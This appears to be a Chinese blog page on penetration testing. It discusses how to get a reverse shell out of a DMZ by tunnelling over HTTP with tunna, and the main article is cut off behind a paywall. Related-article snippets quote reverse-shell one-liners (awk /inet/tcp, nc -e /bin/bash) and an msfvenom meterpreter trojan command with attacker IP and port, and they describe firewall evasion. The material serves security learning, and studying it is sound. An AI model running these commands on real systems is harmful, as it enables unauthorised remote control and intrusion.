Shell反弹不出来怎么办呢?

最新推荐文章于 2024-09-19 10:35:56 发布
原创 最新推荐文章于 2024-09-19 10:35:56 发布 · 2.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#shell #你的shell #shell反弹不出来怎么办?

在渗透测试中,当shell无法从DMZ区域反弹时,可以利用HTTP响应进行数据转发。文章介绍了利用tunna工具进行远程终端数据转发的方法,包括上传tunna文件到服务器、在MSF下配置payload等步骤,以解决shell速度慢的问题。同时建议使用meterpreter进行http转发进行后渗透攻击,强调灵活应用技巧。

在这里插入图片描述
在渗透测试过程中,遇到shell无法反弹的情况,你是怎么处理的呢?
通常情况下,web服务器都放在了DMZ里面,那么就造成了数据的只进不出的情况,
数据不出就意味着无法反弹shell,但是他服务器的HTTP必须要出来,否则就无法响应访问了
那么我们就利用这一点来下功夫吧:)

工具有现成的了 — tunna
Mickey牛写的tunna使用实例
里面写的实例是tunna做远程终端数据转发,大部分人就以为tunna只能这样用了,上次小学弟还向我抱怨tunna慢来着:(

如何转发呢?
在这里插入图片描述
通过webshell上传上去并执行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

最低0.47元/天 解锁文章
靶机g0rmint练习:php一句话写入登录失败日志反弹shell,利用版本漏洞提权
7Riven's blog
01-07 728
1.主机发现 2.端口扫描 3.访问80端口看看 果然404页面,看看robots.txt 4.目录扫描 用dirbuster扫描看看 依次快速访问完目录后未发现有用信息,就先从登录界面仔细找找 查看下源码 直接访问试试,没什么结果 扫描该目录下还有哪些文件 只找到了一个,访问看看 有一个压缩后门文件,尝试下载看看 解压后如下: ...
安全攻防渗透测试一键生成反弹shell自动化工具
12-20
2. 傻瓜式操作:仅需双击exe文件或直接运行源码启动程序,输入反弹的ip和port,就能一键生成各类反弹shell 3. 界面清爽易读:程序所有内容均呈现在一页,排列有序,清爽整洁,一目了然。 4. 反弹代码全:本软件集成...
阿里云msf配合冰蝎反弹shell成功
weixin_43896364的博客
07-12 1557
前言:自己使用冰蝎配合msf遇到的一个小问题,记录一下,希望能够帮助到同样卡在这的hxd。 前提:确保使用冰蝎成功连接上了webshell并且可以执行命令,怎么点击“给我连”都只是左下角出现“反弹成功。”字样而云服务器的msf上却并没有监听成功。 假设你使用msf监听的是5566端口,那么只需要在阿里云控制台添加一条安全规则即可: 这样再连就能连上了。 ...
别再头疼反弹Shell失败了,这篇文章带你找到问题根源
vivlol918的博客
09-01 2278
例如,如果目标系统的防火墙只允许80端口(HTTP)和443端口(HTTPS)的流量通过,而你尝试使用其他端口进行反弹shell,那么连接将被阻止,导致失败。
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
什么是反弹shell?如何使用反弹shell
10-30
反弹 Shell 是一种远程控制技术,它可以在目标主机上启动一个 Shell,并将其连接回攻击者的主机,从而使攻击者可以在目标主机上执行命令和操作。使用反弹 Shell 可以在某些场景下方便地进行远程控制,例如在没有直接...
一样的视角剖析Linux 反弹shell水印版.pdf
08-02
一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
网络安全基础入门反弹SHELL与正反向连接技术:防火墙绕过及文件下载命令详解
最新发布
04-22
内容概要:本文档主要介绍了基础入门级别的反弹SHELL回显带外、正反向连接、防火墙出入站规则以及文件下载等技术。涵盖Web常规、Web其他、Web拓展、APP架构、小程序架构等方面的知识点。详细讲解了渗透命令如...
反弹shell失败 原来是这个原因
梦想闹钟
08-31 8571
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell 提示没有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是没有解决问题,最后在谷歌上找到了解释 https://evilpan.com/2021/04/25/reverse-shell/ 因此还是使用awk命令一句话反弹shell awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell
[小白/详细]AC2100刷机教程&开启telnet失败&刷Breed-各类问题解决方案
10-24
‘nc.exe'是内部或外部命令,也是可运行的程序 或批处理文件。 8081端口被占用请检查 请按任意键继续.. 开启PPPOE服务器失败,终端最后一行出现  ‘type...error’之类的 Task_反弹shell无法粘贴 Task_PPPOE服务器一直出现请求回复的异常 1)刷写breed命令等待过长,无反应 2)telnet 192.168.31.1-无效
msf反弹shell
weixin_34179762的博客
05-15 1105
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
msf生成linux elf木马反弹成功的解决方法
热门推荐
weixin_42109829的博客
01-06 1万+
0x01 前言 这几天我的msf 要生成linux 的木马 一直反弹成功,用的是以下的paylaod msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.233.131 LPORT=4444 -f elf > mshell.elf 我分析了一下报错,这个报错是没问题的,但生成的木马只有250b ,这明显是 0x02 解决问题 我刚开始认为是我msf的问题 ,回来验证了一下,我的msf 是6的版本,而这个语句是5的写法,而我启动
解决反弹shell易误操作断开及方向键失效的方法
m0_65267037的博客
04-09 878
我们在拿到 shell 时,会发现方向键会变成之类的东西,导致我们在想要修改一些命令时需要把后边的字符全部删了,有时候下意识想 Ctrl+C 一下就小心断开shell了,就很烦,下面的方法可以解决这个问题。
反弹shell的几种方法
星河梦瑾的博客
09-19 1544
目标服务器系统:Ubuntu、CentOS。 攻击者系统:Kali Linux,IP地址为 192.168.0.1,开放 4444 端口。 反弹Shell: 正向反弹Shell:目标机先执行 nc -lvp 4444 -e /bin/bash,然后攻击者使用 nc ip 4444 监听,可以实现Shell反弹。 反向反弹Shell:有多种方法,包括使用 bash、python、nc 本身,以及 php 来实现。每种方法都需要在攻击者机器上先使用 nc -lvp 端口号 进行监听
渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机
hljzzj的博客
01-23 7207
phpinfo文件上传+LFI(文件包含)获取shell,suid提权
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 1309
fastjson 阿里巴巴开发的一个JSON解析库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
内网穿透从搭建到溯源
whatday的专栏
01-11 1092
目录 背景 内网穿透及溯源 网络层隧道搭建 传输层隧道搭建 应用层隧道搭建 测试通信 案例 总结 背景 在攻防博弈这个永久的话题中,永远会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从同的网络协议层进行搭建隧
通过一道“蹩脚”的题想到的
shinfocom
08-21 108
这周为止,学习Linux刚好整整一个月,下面是一道目前对我来说比较大的一道题,用到了DNS的视图(要求必须用),LAMP, VSFTP 的虚拟用户,还有iptabels的各项配置。但是,我今天想要总结的是这道题的做法,而是对这道题的感想。 题目如下: 我画的设计图: DMZ区分析: 1.根据题意需要建立一个DMZ区域,里面提供NFS ,FTP,HTTP,MYSQL的服务...
shell反弹需要植入木马嘛?
08-15
shell反弹通常需要直接植入木马。它是一种黑客攻击技术,在这种技术中,黑客首先通过各种手段(如社会工程学、恶意软件或钓鱼链接)获取对目标计算机的临时访问权限,然后在目标系统上安装一个所谓的"反弹壳"。这...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值